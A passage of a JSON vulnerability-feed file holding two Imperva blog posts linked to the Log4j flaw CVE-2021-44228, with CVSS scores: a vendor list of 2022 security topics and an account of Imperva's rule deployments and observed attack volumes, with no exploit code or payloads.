"COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-14T14:17:29", "id": "RAPID7BLOG:F37BD0C67170721734A26D15E6D99B3E", "href": "https://blog.rapid7.com/2021/12/14/using-insightvm-to-find-apache-log4j-cve-2021-44228/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "impervablog": [{"lastseen": "2022-01-04T12:38:01", "description": "One of the core principles of cybersecurity is not letting things \u201cslip through the cracks\u201d. An effective security posture depends on visibility. The more visibility you have into the environments where your data is, the more successful you will be in applying your organization\u2019s security protocols and identifying suspicious behavior.\n\nHere are five cybersecurity issues that may have \u201cslipped through the cracks\u201d which should be visible to you in 2022.\n\n## [5\\. Exploiting third-party applications](<https://www.imperva.com/blog/5-ways-your-software-supply-chain-is-out-to-get-you-part-2-exploit-third-party-applications/>)\n\nMany people have characterized 2021 as "the year of the [software supply chain attack](<https://www.imperva.com/learn/application-security/supply-chain-attack/>)". Chances are if you were not following the issue closely, you are now in light of the new [CVE-2021-44228 vulnerability](<https://www.imperva.com/blog/how-were-protecting-customers-staying-ahead-of-cve-2021-44228/>).\n\n[Zero-day attacks](<https://www.imperva.com/learn/application-security/zero-day-exploit/>), or unpatched security bugs, in commonly used third-party applications, are an example of the risks we assume from our software supply chain. Often, incomplete requirements, incorrect assumptions, and time-to-market pressures result in the delivery of less-than-perfect software. Generally speaking, software developers do a good job of eliminating software bugs that cause the program to fail in catastrophic or obvious ways. Unfortunately, security bugs don\u2019t typically cause catastrophic system failures. They simply allow a bad actor to make the software do things it wasn\u2019t intended to do like steal other users\u2019 credentials or read the entire contents of a database. Compounding the problem, the rapid-fire ability of bad actors to take advantage of software vulnerability disclosures and our own justifiably cautious patch processes create an asymmetry, with predictable results. It\u2019s rare that an organization will be able to deploy a vendor patch the moment it is made available across all of the necessary locations. Even the best Web Application Firewalls require time to adapt with a new signature update (that must be developed, tested, and deployed) or with an adjustment to a machine learning model, or manual acknowledgment that an anomaly has been detected and should be blocked in the future. Additionally, these \u201cvirtual patches\u201d must be tested in each specific environment prior to deployment to ensure they don\u2019t cause unwanted side effects.\n\nFor more on how to manage software supply chain attacks, get [**5 Key Ways Supply Chain Attacks Occur**](<https://www.imperva.com/resources/resource-library/white-papers/5-key-ways-supply-chain-attacks-occur/>).\n\n## [4\\. Increases in the volume of records stolen](<https://www.imperva.com/resources/resource-library/white-papers/5-key-ways-supply-chain-attacks-occur/>)\n\nThe constant increase in the volume of stolen records is the result of multiple factors. We are living in a digitalization era in which more services are consumed daily, with the majority of them online so the amount of data out there increases every year. More businesses have made a very quick shift into digitalization, which if not done carefully, increases security risk. Information security adoption is slower than the adoption of digital services that make a profit from the addiction to and consumption of the same online services. Such a fast, dramatic change is likely to have security implications. Higher volume, less secure data is now stolen in ever-larger chunks. Organizations need to rethink to protect the growing body of critical business data.\n\nLearn more about this in [**Lessons Learned from Analyzing 100 Data Breaches**](<https://www.imperva.com/resources/resource-library/white-papers/lessons-learned-from-analyzing-100-data-breaches/>).\n\n## [3\\. More effective Web Application Firewall Gateway technology](<https://www.imperva.com/blog/impervas-waf-gateway-14-4-protects-enterprises-for-the-post-covid-era/>)\n\nA [recent report](<https://www.verizon.com/business/resources/reports/dbir/>) revealed 39% of all data breaches in 2020 stemmed from web application compromise, a trend that became more pronounced in 2021. Organizations need to get more effective protection from their Web Application Firewalls (WAFs). Here are some of the things your WAF needs to do to take on today\u2019s web application threat vectors:\n\n[More than 24 percent of internet traffic is bad bots](<https://www.imperva.com/resources/resource-library/reports/2020-Bad-Bot-Report/>), so your WAF should offer [Advanced Bot Protection](<https://www.imperva.com/products/advanced-bot-protection-management/>) that enables true defense-in-depth security in a single stack model.\n\nYour WAF should provide optimized security and performance benefits for your digital protocols from HTTP2 to TLS 1.3. For activities such as dropping more dynamic content from video snip-bits to 3D visuals, your WAF should facilitate your ability to supersize the customer experience from website to smartphone to support your organization\u2019s omnichannel strategies.\n\nLearn more about next-level WAF Gateway [here](<https://www.imperva.com/resources/resource-library/datasheets/imperva-waf-gateway/>).\n\n## [2\\. New bad bot mitigation strategies](<https://www.imperva.com/blog/bad-bots-continue-to-evolve-your-mitigation-strategy-should-too/>)\n\nBad actors are capitalizing on the opportunities that digital transformation creates, particularly through more sophisticated automated bad bot attacks. But tools to thwart these attacks have become more advanced, too. What should you look for in a solution?\n\nA truly \u201cfuture-proof\u201d bad bot solution will be equipped to handle the most sophisticated bad bots. It must incorporate machine learning that is capable of identifying real-time bad bot behavior and adapting. It also helps establish a baseline for normal behavior, as well as enable automated detection and response. Your solution should be able to block bots from the very first request they make and protect all your access points: websites, mobile apps, and APIs.\n\nLook for device fingerprinting, allowing the solution to track bot activity across IP addresses and detect browser automation tools. Such tools are capable of processing JavaScript and emulating legitimate browsers, making them more difficult to identify and block. The solution should contain cutting-edge techniques, such as injection of active challenges and honeypots into HTTP traffic, per-URL customization and security controls to fine-tune protection; graduated controls for rate-limiting, such as by client, device, authentication token, or simple IP address; and enable community-sourced threat intelligence to help customers learn from one another.\n\nLearn more in [**Imperva\u2019s Ten Essential Capabilities of a Bot Management Solution**](<https://www.imperva.com/resources/resource-library/white-papers/buyers-guide-ten-essential-capabilities-of-a-bot-management-solution/>).\n\n## [1\\. The economic impact of a data security platform](<https://www.imperva.com/blog/infographic-what-is-the-economic-impact-of-a-data-security-platform/>)\n\nVirtually all cybersecurity professionals understand the need to create a data security platform to mitigate threats to sensitive data, but very few people know how to present the acquisition, development, and deployment of a data security platform as a business driver with a demonstrable ROI.\n\nEstablishing a starting point for the evolution of your data security platform can make all the difference. Articulating the challenges that your organization faces is the first step. Mapping these challenges to quantifiable benefits is the next. Having a framework from which to start saves time because your team can modify data points to align with your organization\u2019s requirements. For example, regional salary assumptions and the number of systems to be protected. It also will likely open your eyes to scenarios that you may not have thought of, in the actual language from current consumers of data security technology that have already benefited from the transition.\n\nWhile it can be hard to show the economic impact of change, it\u2019s not impossible. Oftentimes it is easier to modify existing work (red pen) than start from scratch (black pen). [Download the infographic](<https://www.imperva.com/resources/resource-library/infographics/the-total-economic-impact-of-the-imperva-data-protection-solution/>), _The Total Economic Impact of the Imperva Data Protection Solution_ to see the key challenges that organizations faced prior to implementing a data security platform and the resulting benefits after deployment.\n\nThe post [2021 in Review, Part 4: 5 Cybersecurity Topics to Watch in 2022](<https://www.imperva.com/blog/2021-in-review-part-4-5-cybersecurity-topics-to-watch-in-2022/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-04T10:44:57", "type": "impervablog", "title": "2021 in Review, Part 4: 5 Cybersecurity Topics to Watch in 2022", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-04T10:44:57", "id": "IMPERVABLOG:DB0BBA5A6E2E523FAA7F7A73C45FEA96", "href": "https://www.imperva.com/blog/2021-in-review-part-4-5-cybersecurity-topics-to-watch-in-2022/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-14T10:37:09", "description": "[CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>) is a high profile vulnerability impacting multiple versions of a widely distributed Java software component, Apache Log4j 2. The specific vulnerability allows for unauthenticated remote code execution. For additional technical information, the team at LunaSec has an excellent technical writeup on their [blog](<https://www.lunasec.io/docs/blog/log4j-zero-day/>).\n\nIn terms of magnitude, this will without any doubt, have a big impact on all organizations running Java workloads. Similar to other common vulnerabilities and exposures (CVEs) in its class (referring to those affecting Struts 2 back in 2017), best practices require security teams to immediately patch their software and upgrade third-party components to meet SLAs.\n\nIn the spirit of transparency, we want to give everyone a succinct update on how Imperva responded and is continuing to focus on this specific CVE. \n\n# Imperva Threat Research Response & Observations\n\nImperva Threat Research sprang into action shortly after this zero-day exploit was made public. We saw initial attacks attempting to exploit this CVE starting around December 9, 2021 18:00 UTC. \n\n**Existing security rules put in place for Imperva Cloud WAF customers appear to have mitigated these early CVE attacks without requiring any patching.**\n\nImperva Threat Research detected new CVE-specific attack variants, resulting in the creation of additional security rules on December 10, 2021 5:41 UTC. These updates were tested and deployed to the Imperva Global Network and ThreatRadar Feed on December 10, 2021 11:44 UTC. \n\nThroughout the day, more attack variants were detected, resulting in the creation of additional rules and a deployment on December 10, 2021 22:46 UTC.\n\nAs of writing this blog post, and since rolling out the updated security rules more than 13 hours ago, Imperva has observed **1.4M+ attacks targeting CVE-2021-44228.**\n\nAs you can see from the graph above, we\u2019ve observed peaks reaching roughly **280K attacks **per hour. As with other CVEs in its class, we expect to see this number grow, especially as new variants are created and discovered over the coming days and weeks.\n\nAnother interesting property of this particular attack is the normal distribution across industries, which makes sense as Java is a very popular language for building applications and APIs.\n\nLooking at the distribution of attacks by country (illustrated above), there is nothing abnormal and furthers our hypothesis that the attacks are trying to exploit a vulnerability versus targeting specific industries or countries.\n\n# Another Strong Case for RASP\n\nIn 2018, Imperva acquired Prevoty, the market and analyst-recognized leader of [runtime application self-protection (RASP)](<https://www.imperva.com/products/runtime-application-self-protection-rasp/>). The rationale behind the acquisition was that organizations would want to have last-mile protection for applications and APIs, particularly as they became more dynamic and dependent on third-party software components. \n\nAs the lifecycle of CVE-2021-44228 is getting started, we can\u2019t help but be reminded of the myriad of Struts 2 CVEs from 2017. Similarly, organizations of all sizes are going to be forced to identify and patch first and third-party applications and APIs. \n\nWe also recommend that customers implement RASP as part of a broader defense-in-depth strategy for protecting their applications and APIs. Some of Imperva\u2019s customers, including eCommerce and telco providers, have been able to save thousands of hours in emergency patching and speed up the secure software development lifecycle. **Customers that have Imperva RASP deployed across their Java applications are protected from RCEs related to CVE-2021-44228.**\n\n# Ongoing Vigilance\n\nImperva Threat Research is continuing to monitor, create, test and deploy CVE-specific security rules based on new attack variants for all of our customers. We will keep all our customers notified as this progresses. \n\nFor customers looking for support please access the [Imperva Support Portal](<https://support.imperva.com>).\n\nIf you\u2019re looking for protection from CVE-2021-44228, please [contact us](<https://www.imperva.com/contact-us/>).\n\nThe post [How We\u2019re Protecting Customers & Staying Ahead of CVE-2021-44228](<https://www.imperva.com/blog/how-were-protecting-customers-staying-ahead-of-cve-2021-44228/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-11